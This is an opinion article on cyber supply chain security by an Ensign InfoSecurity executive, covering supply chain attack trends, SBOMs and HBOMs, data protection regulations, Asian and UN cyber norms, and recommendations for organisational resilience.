Yahoo Finance Supply chain in the digital age: Risks, regulations, and resilience
Despite the critical role of supply chain security, its intricacies often remain hidden. So what should organisations do?
As threat actors shift their focus from direct attacks on organisations to targeting supply chains, the need to prioritise cyber supply chain risk management has never been greater. These attacks pose a significant challenge, compromising trusted parts of the technology ecosystem and potentially affecting multiple organisations through a single compromised link in the chain.
Often, we find lesser-resourced small and medium enterprises downstream in the cyber supply chain. These organisations may not have the same capacity and competencies needed to defend against cyber-attacks. By exploiting weaknesses in these vendors and suppliers, attackers gain access to infiltrate and disrupt larger entities, making these smaller entities in a supply chain prominent targets.
Despite the critical role of supply chain security, its intricacies often remain hidden. Consider this: you order a product online, and like clockwork, it arrives at your doorstep within days. Behind this seemingly seamless process lies a complex network of suppliers, manufacturers, distributors, retailers, and logistics service providers – the supply chain. Now, add a layer of cybersecurity to this intricate web, and you have the cyber supply chain.
But why should we care about securing this invisible lifeline? The answer lies in the impact it has on businesses, consumers, and the global economy.
The numbers tell a story too. Between 2019 and 2022, there was a substantial increase in the number of software packages affected by cyber supply chain attacks globally, rising from 702 to 185,572. Data reveals that between January and March 2023 alone, the number of software packages impacted by such cyber-attacks reached 17,150.
In 2022, approximately 11 million customers fell victim to supply chain cyber-attacks globally. During the first quarter of 2023, over 60 thousand customers reported impacts from these attacks, with common targets including counterfeiting, drive-by compromise, and malware infections. These numbers resonate from noteworthy vulnerabilities which were exploited by threat actors, the following comes to mind: SolarWinds, Log4J, and even the more recent waves of cyber-attacks targeting vulnerabilities in Ivanti’s VPN solution and Cisco’s networking products.
This underscores the vital necessity for robust cyber supply chain risk management. Now, let us delve into how we can achieve this.
Vendor, software and hardware dynamics
Cyber supply chain attacks often target open-source code or commercially available APIs used by developers because these reusable components are commonly found in various software applications. Cybercriminals exploit vulnerabilities in these components to gain unauthorised access to systems, steal sensitive data, or spread malicious software.
Many websites rely on code provided by vendors and service providers to enhance their functionality, such as social sharing buttons, advertising frames, payment processing tools, and chatbots.
Implementing operational strategies across vendors, software, and hardware is essential for continuously monitoring and mitigating cyber supply chain risks. Additionally, legislation and regulation are needed to ensure accountability and responsibilities across the supply chain. Emerging practices, like Software Bill of Materials (SBOMs) and Hardware Bill of Materials (HBOMs) are gaining traction, but they are only the very beginning of a material effort to reign in the risks.
SBOMs and HBOMs are critical because modern enterprises heavily rely on applications that integrate a wide range of components sourced from multiple parties, which cybercriminals often exploit. Without proper inventory and tracking of software and hardware components, organisations remain oblivious to vulnerabilities that may exist in the supply chain. Likewise, being unaware of the vendors in the supply chain might leave an organisation vulnerable when security breaches, compliance issues, and system failures occur at the vendor level, leading to cascading impacts. By maintaining this awareness and developing mitigation strategies within the risk appetite, development teams can better manage and secure their technology stack.
With the fast-paced development of technology, embedding cybersecurity upstream is also important. For example, integrating cyber-aware procurement practices with DevSecOps embeds security considerations across the entire supply chain lifecycle, from procurement to deployment and subsequently the disposal. This helps identify and mitigate security risks early in the development phase and enforces controls throughout the lifecycle.
Minimising risks: Norms and regulations
In today’s digital landscape, protecting sensitive data goes beyond good practice—it’s a legal necessity. Regulations like the General Data Protection Regulation (GDPR) in the EU, the Health Insurance Portability and Accountability Act (HIPAA) in the US, and the Personal Data Protection Act (PDPA) in Singapore offer vital guidelines for safeguarding personal and medical information. Compliance is not just about avoiding penalties; it is about building trust with customers, patients, and stakeholders.
In Asia, cybersecurity norms, established at the United Nations (UN), are advocated by regional initiatives like the Asean Cybersecurity Cooperation Strategy. Countries such as Japan, South Korea, and Singapore have developed robust national strategies that adhere to both global standards and local requirements. They all focus on leveraging public-private partnerships and supporting cybersecurity innovation.
Collaboration efforts in Asean and Singapore with UN and INTERPOL have helped to synchronise regional and global cybersecurity practices. A distinctive feature in Asia is the emphasis on cyber sovereignty, where global norms are adapted to suit local contexts. Substantial investments in cybersecurity infrastructure and capacity building are being made to address regional threats and challenges.
In Singapore, the government-led Counter Ransomware Task Force is actively addressing cyber-attacks that result from Ransomware infections, a critical concern for businesses. Notably, it has led to establishing guidelines on ransom payment and recommended comprehensive strategies, plans, and capabilities for effectively countering Ransomware threats.
Besides, Singapore has aligned with and committed to continuing the implementation of cyber norms established by the United Nations, which includes developing a checklist of steps for countries to adopt guidelines on cybersecurity. All with the aim of making it safer using Information Communication and Technology (ICT) products. Singapore’s Ambassador and Permanent Representative of Singapore to the United Nations in New York, Mr. Burhan Gafoor, also serves as the Chairperson for the Open-Ended Working Group (OEWG), contributing to the proliferation and implementation of cyber norms globally.
While the Geneva Dialogue on Responsible Behaviours in Cyberspace has made strides in bringing cyber supply chain risk management to the forefront of international discourse, measuring its direct impact on enhancing cyber defence is challenging. With the Geneva Manual, suggested actions are provided to help different stakeholders in the ecosystem understand viable implementations they can take, and the dialogue serves as an avenue for further understanding and development of consensus and understanding.
In addition to these initiatives, there is a growing global consensus on cyber norms, evident in agreements like the Paris Call for Trust and Security in Cyberspace and the Budapest Convention on Cybercrime. While these efforts establish a framework of expected behaviours, actual implementation varies across countries due to differing national interests and cybersecurity capabilities.
Steps towards cyber resilience
Recognising the multifaceted nature of the cybersecurity challenge we face, governments worldwide are taking measures to bolster cybersecurity compliance, particularly in critical infrastructure sectors. As various countries introduce or consider legislation mandating cybersecurity standards, the path forward will progressively become clearer.
Implementing universal cybersecurity standards, encouraging research and development, and fostering public-private partnerships are key. Education and training initiatives to build a skilled cybersecurity workforce are also essential. Finally, developing an international legal framework to address cybercrimes and encourage responsible state behaviour in cyberspace could significantly strengthen cyber supply chain security.
Simultaneously, the private sector must take proactive measures. This includes being aware of their digital attack surface which encompasses the cyber supply chain, architecting technology to embed protection solutions and protective defensive opportunities.
Additionally, organisations should conduct regular cybersecurity risk assessments and audits to evaluate governance capabilities. This involves engaging in threat hunting, technical security tests and red team exercises to validate their defensive processes.
Simulation exercises such as tabletop exercises and wargames should also be performed to assess the organisations’ ability to manage incidents and crises. It will also bode well for organisations to participate in information sharing and intelligence sharing to improve their awareness, enable early warning and identify opportunities for proactive defensive actions.
Addressing potential threats within the cyber supply chain is an ongoing effort that cannot be resolved overnight, but with consistent vigilance and strategic planning, solutions can be achieved.
Teo Xiang Zheng is the vice president of Advisory, Ensign InfoSecurity
See Also:
Click here to stay updated with the Latest Business & Investment News in Singapore
ST Engineering to build a green, secure and AI-ready data centre
YKGI encounters cybersecurity incident, Chicha San Chen membership database hacked
Get in-depth insights from our expert contributors, and dive into financial and economic trends
